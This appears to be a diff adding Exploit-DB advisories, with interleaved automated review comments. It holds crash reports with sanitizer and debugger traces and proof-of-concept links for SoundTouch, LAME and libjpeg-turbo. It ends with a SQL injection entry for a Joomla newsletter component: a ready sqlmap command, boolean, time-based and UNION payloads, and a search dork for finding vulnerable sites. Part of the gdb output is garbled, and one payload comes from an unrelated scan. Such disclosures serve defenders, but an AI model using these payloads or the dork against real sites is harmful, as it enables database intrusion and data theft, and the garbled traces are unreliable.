fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + ASan internal: fe +==87598==ABORTING + + +POC: +SoundTouch_1.9.2_heap_buffer_overflow.wav +CVE: 
+CVE-2017-9260
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42389.zip
diff --git a/platforms/linux/dos/42390.txt b/platforms/linux/dos/42390.txt
new file mode 100755
index 000000000..c6c778f55
--- /dev/null
+++ b/platforms/linux/dos/42390.txt
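Review bot: In 42389.txt the POC line for issue 2 (CVE-2017-9259) names `SoundTouch_1.9.2_infinite_loop.wav`, which is the issue-1 file, while the reproduction command a few lines above it uses `SoundTouch_1.9.2_memory_allocation_error.wav`; the POC line should read `SoundTouch_1.9.2_memory_allocation_error.wav` so the file in the 42389.zip archive is matched to the right CVE. That same block (`POC:`, `CVE:`, `3.` and the issue-3 description) is indented by one space where the rest of the file is flush left, which looks like a paste artefact and is worth normalising while the file is being added.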
@@ -0,0 +1,191 @@ +LAME multiple vulnerabilities +================ +Author : qflb.wu +=============== + + +Introduction: +============= +Following the great history of GNU naming, LAME originally stood for LAME Ain't an Mp3 Encoder. +LAME is an educational tool to be used for learning about MP3 encoding. The goal of the LAME project is to use the open source model to improve the psycho acoustics, noise shaping and speed of MP3. + + +Affected version: +===== +3.99.5 + + +Vulnerability Description: +========================== +1. +the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file. + + +./lame lame_3.99.5_heap_buffer_overflow.wav out + + +==26618==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000009f08 at pc 0x5f3a1e bp 0x7ffdfaf74620 sp 0x7ffdfaf74618 +READ of size 4 at 0x60c000009f08 thread T0 + #0 0x5f3a1d in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606 + #1 0x5f3a1d in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677 + #2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736 + #3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891 + #4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963 + #5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462 + #6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531 + #7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707 + #8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470 + #9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438 + #10 0x7ff8c8771f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c) + + +0x60c000009f08 is located 8 bytes to the right of 
128-byte region [0x60c000009e80,0x60c000009f00) +allocated by thread T0 here: + #0 0x46ba59 in calloc (/home/a/Downloads/lame-3.99.5/frontend/lame+0x46ba59) + #1 0x5f1302 in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:561 + #2 0x5f1302 in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677 + + +SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606 fill_buffer_resample +Shadow bytes around the buggy address: + 0x0c187fff9390: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa + 0x0c187fff93a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c187fff93b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c187fff93c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa + 0x0c187fff93d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c187fff93e0: fa[fa]fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c187fff93f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa + 0x0c187fff9400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c187fff9410: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c187fff9420: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa + 0x0c187fff9430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + ASan internal: fe +==26618==ABORTING + + +POC: +lame_3.99.5_heap_buffer_overflow.wav +CVE: +CVE-2017-9410 + + +2. +the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file. 
+
+
+./lame lame_3.99.5_invalid_memory_read_1.wav out
+
+
+==30841==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005f24ed sp 0x7ffee94d3050 bp 0x000000000000 T0)
+ #0 0x5f24ec in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608
+ #1 0x5f24ec in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
+ #2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
+ #3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
+ #4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
+ #5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
+ #6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
+ #7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
+ #8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
+ #9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
+ #10 0x7f48b8cacf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
+ #11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
+
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608 fill_buffer_resample
+==30841==ABORTING
+
+
+POC:
+lame_3.99.5_invalid_memory_read_1.wav
+CVE:
+CVE-2017-9411
+
+
+3.
+the unpack_read_samples function in frontend/get_audio.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
+
+
+./lame lame_3.99.5_invalid_memory_read_2.wav out
+
+
+(gdb) r
+Starting program: lame file out
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
+
+
+Program received signal SIGSEGV, Segmentation fault.
+0x080f27b3 in unpack_read_samples (samples_to_read=-146880,
+ bytes_per_sample=, swap_order=-2088828928,
+ pcm_in=0xb6303d80, sample_buffer=) at get_audio.c:1204
+1204 GA_URS_IFLOOP(1)
+(gdb) disassemble 0x080f27b3,0x080f27ff
+Dump of assembler code from 0x80f27b3 to 0x80f27ff:
+=> 0x080f27b3 :mov 0x20000000(%eax),%al
+ 0x080f27b9 :test %al,%al
+ 0x080f27bb :je 0x80f27d0
+ 0x080f27bd :mov $0x8320b78,%edx
+ 0x080f27c2 :and $0x7,%edx
+ 0x080f27c5 :add $0x3,%edx
+ 0x080f27c8 :cmp %al,%dl
+ 0x080f27ca :jge 0x80f6715
+ 0x080f27d0 :xor $0xf879,%ebx
+ 0x080f27d6 :add 0x8320b78,%ebx
+ 0x080f27dc :mov %ebx,%eax
+ 0x080f27de :shr $0x3,%eax
+ 0x080f27e1 :mov 0x20000000(%eax),%al
+ 0x080f27e7 :test %al,%al
+ 0x080f27e9 :je 0x80f27f8
+ 0x080f27eb :mov %ebx,%edx
+ 0x080f27ed :and $0x7,%edx
+ 0x080f27f0 :cmp %al,%dl
+ 0x080f27f2 :jge 0x80f6727 to continue, or q to quit---
+ 0x080f27f8 :incb (%ebx)
+ 0x080f27fa :movl $0x7c3c,%gs%edi)
+End of assembler dump.
+(gdb) i r
+eax 0x837f0000-2088828928
+ecx 0x24489288
+edx 0xbfee5e20-1074897376
+ebx 0x7c3c31804
+esp 0xbfee4c200xbfee4c20
+ebp 0xbfee82780xbfee8278
+esi 0xfffffcf2-782
+edi 0xfffffffc-4
+eip 0x80f27b30x80f27b3
+eflags 0x10246[ PF ZF IF RF ]
+cs 0x73115
+ss 0x7b123
+ds 0x7b123
+es 0x7b123
+fs 0x00
+gs 0x3351
+(gdb) x/20x 0x837f0000
+0x837f0000:Cannot access memory at address 0x837f0000
+
+
+POC:
+lame_3.99.5_invalid_memory_read_2.wav
+CVE:
+CVE-2017-9412
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42390.zip
diff --git a/platforms/linux/dos/42391.txt b/platforms/linux/dos/42391.txt
new file mode 100755
index 000000000..7ca6c3421
--- /dev/null
+++ b/platforms/linux/dos/42391.txt
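Review bot: The gdb capture for issue 3 in 42390.txt has lost tokens and cannot be read as-is: `bytes_per_sample=,` and `sample_buffer=)` have empty values, every disassembly line carries a bare `:` where the symbol+offset label should be, and `movl $0x7c3c,%gs%edi)` is not valid AT&T syntax; this looks like angle-bracketed text (presumably `<optimized out>` and `<unpack_read_samples+N>`) stripped as markup, with the pager prompt `---Type <return> to continue, or q to quit---` similarly mangled onto the `jge 0x80f6727` line. Since the lost text cannot be recovered from what is here, either re-paste the raw gdb session or add a line under `----debug info:----`-style heading saying the capture was mangled on import. The `Starting program: lame file out` line also does not match the reproduction command `./lame lame_3.99.5_invalid_memory_read_2.wav out` given just above it, which makes it unclear which file produced the trace; the same kind of stripped placeholder appears in 42386.txt (`objdump -x -C` with no operand).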
@@ -0,0 +1,141 @@
+libjpeg-turbo denial of service vulnerability
+======================
+Author : qflb.wu
+CVE : CVE-2017-9614
+======================
+
+
+Introduction:
+=============
+libjpeg-turbo is a JPEG image codec that uses SIMD instructions (MMX, SSE2, AVX2, NEON, AltiVec) to accelerate baseline JPEG compression and decompression on x86, x86-64, ARM, and PowerPC systems.
+
+
+Affected version:
+=====
+1.5.1
+
+
+Vulnerability Description:
+==========================
+the fill_input_buffer function in jdatasrc.c in libjpeg-turbo 1.5.1 can cause a denial of service(invalid address and application crash) via a crafted jpg file.
+
+
+I found this bug when I test stills2dv-alpha-0.601 which used the libjpeg-turbo.
+
+
+./stills2dv exampleworkfile.s2d
+
+
+(the exampleworkfile.s2d contains the path of the poc jpg file)
+
+
+----debug info:----
+gdb-peda$ bt
+#0 __memcpy_sse2 () at ../sysdeps/x86_64/multiarch/../memcpy.S:166
+#1 0x00007ffff6d82323 in __GI__IO_file_xsgetn (fp=0x61c370,
+ data=, n=0x1000) at fileops.c:1387
+#2 0x00007ffff6d7786f in __GI__IO_fread (buf=, size=0x1,
+ count=0x1000, fp=0x61c370) at iofread.c:42
+#3 0x00007ffff7b6e23b in fill_input_buffer (cinfo=0x7fffffffe190)
+ at jdatasrc.c:107
+#4 0x00007ffff7b7beef in get_dqt (cinfo=0x7fffffffe190) at jdmarker.c:516
+#5 0x00007ffff7b7dba3 in read_markers (cinfo=0x7fffffffe190)
+ at jdmarker.c:1050
+#6 0x00007ffff7b795fd in consume_markers (cinfo=0x7fffffffe190)
+ at jdinput.c:320
+#7 0x00007ffff7b6c853 in jpeg_finish_decompress (cinfo=0x7fffffffe190)
+ at jdapimin.c:399
+#8 0x0000000000402da0 in readjpg (
+ fn=fn@entry=0x61c2f4 "example_data_files/test.jpg") at s2d_jpg.c:148
+#9 0x0000000000403c5b in openImage (
+ fn=0x61c2f4 "example_data_files/test.jpg", cache=0xffffffff)
+ at s2d_main.c:202
+#10 0x00000000004063a5 in splitted2struct (p=p@entry=0x60acc0 ,
+ strs=strs@entry=0x61c2a0) at s2d_main.c:1139
+#11 0x000000000040240b in main (argc=argc@entry=0x2,
+ argv=argv@entry=0x7fffffffe5f8) at 
s2d_main.c:1404
+#12 0x00007ffff6d2af45 in __libc_start_main (main=0x402040
, argc=0x2,
+ argv=0x7fffffffe5f8, init=, fini=,
+ rtld_fini=, stack_end=0x7fffffffe5e8) at libc-start.c:287
+#13 0x0000000000402500 in _start ()
+
+
+
+
+=================================================================================
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+0x00007ffff7b6e233107 nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE);
+gdb-peda$
+[----------------------------------registers-----------------------------------]
+RAX: 0x61ce30 --> 0x464a1000e0ffd8ff
+RBX: 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (:push rbp)
+RCX: 0x61c370 ("example_data_files/test.jpg")
+RDX: 0x1000
+RSI: 0x1
+RDI: 0x61ce30 --> 0x464a1000e0ffd8ff
+RBP: 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg")
+RSP: 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0
+RIP: 0x7ffff7b6e236 (
+R8 : 0x67706a2e747365 ('est.jpg')
+R9 : 0x7ffff70ca7b8 --> 0x623770 --> 0x0
+R10: 0x7fffffffde90 --> 0x0
+R11: 0x7ffff7b6c74c (:push rbp)
+R12: 0x61c2f4 ("example_data_files/test.jpg")
+R13: 0x61c5b0 --> 0x61c370 ("example_data_files/test.jpg")
+R14: 0xc00 ('')
+R15: 0x3
+EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+ 0x7ffff7b6e229 :mov edx,0x1000
+ 0x7ffff7b6e22e :mov esi,0x1
+ 0x7ffff7b6e233 :mov rdi,rax
+=> 0x7ffff7b6e236 :
+ call 0x7ffff7b477f0
+ 0x7ffff7b6e23b :mov QWORD PTR [rbp-0x10],rax
+ 0x7ffff7b6e23f :cmp QWORD PTR [rbp-0x10],0x0
+ 0x7ffff7b6e244 :
+ jne 0x7ffff7b6e2bb
+ 0x7ffff7b6e246 :mov rax,QWORD PTR [rbp-0x8]
+Guessed arguments:
+arg[0]: 0x61ce30 --> 0x464a1000e0ffd8ff
+arg[1]: 0x1
+arg[2]: 0x1000
+arg[3]: 0x61c370 ("example_data_files/test.jpg")
+[------------------------------------stack-------------------------------------]
+0000| 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0
+0008| 
0x7fffffffdfd8 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (:push rbp)
+0016| 0x7fffffffdfe0 --> 0x5bffffe0bc
+0024| 0x7fffffffdfe8 --> 0x61c880 --> 0x61d028 --> 0x0
+0032| 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg")
+0040| 0x7fffffffdff8 --> 0x7ffff7b7beef (:test eax,eax)
+0048| 0x7fffffffe000 --> 0x0
+0056| 0x7fffffffe008 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (:push rbp)
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+0x00007ffff7b6e236107 nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE);
+gdb-peda$ x/20x $rdi
+0x61ce30:0x464a1000e0ffd8ff0x1c00020101004649
+0x61ce40:0x4300dbff00001c000x28191e231e1c2800
+0x61ce50:0x3c30282b2d2321230x587b3c37373c4164
+0x61ce60:0x8f9699809164495d0xa0c3e6b4a08a8c80
+0x61ce70:0xcbffc88c8aaddaaa0xc19bfffffff5eeda
+0x61ce80:0xfffde6fffaffffff0x2d2b014300dbfff8
+0x61ce90:0x764141763c353c2d0xf8f8f8f8a58ca5f8
+0x61cea0:0xf8f8f8f8f8f8f8f80xf8f8f8f8f8f8f8f8
+0x61ceb0:0xf8f8f8f8f8f8f8f80xf8f8f8f8f8f8f8f8
+0x61cec0:0xf8f8f8f8f8f8f8f80xc0fff8f8f8f8f8f8
+
+
+gdb-peda$ ni
+Program received signal SIGSEGV, Segmentation fault.
+
+
+POC:
+test.jpg;exampleworkfile.s2d
+CVE:
+CVE-2017-9614
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42391.zip
diff --git a/platforms/php/webapps/42387.txt b/platforms/php/webapps/42387.txt
new file mode 100755
index 000000000..a5f3f38b7
--- /dev/null
+++ b/platforms/php/webapps/42387.txt
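Review bot: The attribution of CVE-2017-9614 to fill_input_buffer in jdatasrc.c is not established by the trace in this advisory: the fault is inside glibc's memcpy under fread() called at jdatasrc.c:107, the destination src->buffer (RDI=0x61ce30) is readable in the x/20x dump and the count is the fixed INPUT_BUF_SIZE of 0x1000, so the evidence is equally consistent with earlier heap corruption or with a source manager set up incorrectly by the host application, and the only reproduction given runs through stills2dv's readjpg/openImage path rather than libjpeg-turbo's own tools. Triagers would want a reproduction against djpeg (or jpegtran) built with AddressSanitizer, which would show whether the write is out of bounds and which allocation it hits. The write-up also lacks the upstream position and a fixed version; a line such as `Vendor status: <fill in upstream response and issue reference>` under "Affected version" would make it actionable. Finally the POC is fetched from a zip URL with no checksum, so `POC sha256: <fill in>` would let readers verify the sample they download.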
@@ -0,0 +1,44 @@
+"Joomla Component ccnewsletter 2.1.9 - 'sbid' Parameter SQL Injection"
+
+
+# Exploit Title: Joomla Component ccnewsletter 2.1.9 - SQL Injection
+# Date: 07-26-2017
+# Exploit Author: Shahab Shamsi
+# Vendor Homepage: https://extensions.joomla.org/extension/ccnewsletter/
+# Version: = 2.1.9 [Final Version]
+# Tested on: Win,Linux
+# Google Dork: inurl:"index.php?option=com_ccnewsletter" inurl:sbid
+# Video Refrence: http://securityman.org/joomla-component-ccnewsletter-2-1-9-sql-injection/
+
+
+
+
+Sqlmap:
+
+sqlmap -u "http://Target/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=[SQL]&tmpl=newsletter" -p sbid --dbs
+
+
+
+
+Testing Method:
+ - boolean-based blind
+ - time-based blind
+ - UNION query
+
+
+
+Parameter: sbid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter
+ Type: AND/OR time-based blind
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 10 columns
+ Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter
+ Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
+ Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
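Review bot: The last "Parameter replace" entry targets `option=com_fields&view=fields&layout=modal&list[fullordering]=...`, which is Joomla core's com_fields rather than com_ccnewsletter and does not use the sbid parameter this advisory is about, so it appears to have been pasted from a different scan and should be removed or labelled as unrelated to the 2.1.9 ccnewsletter finding. The write-up also never names the vulnerable file or query in the component, nor whether the vendor was notified or a fixed release exists; a line such as `Fix: <fill in vendor response / fixed version>` after "# Version:" would let administrators decide whether to patch or remove the extension. For detection, defenders can watch web logs for sbid values that are not plain integers on index.php?option=com_ccnewsletter requests. "Refrence" in the header should read "Reference".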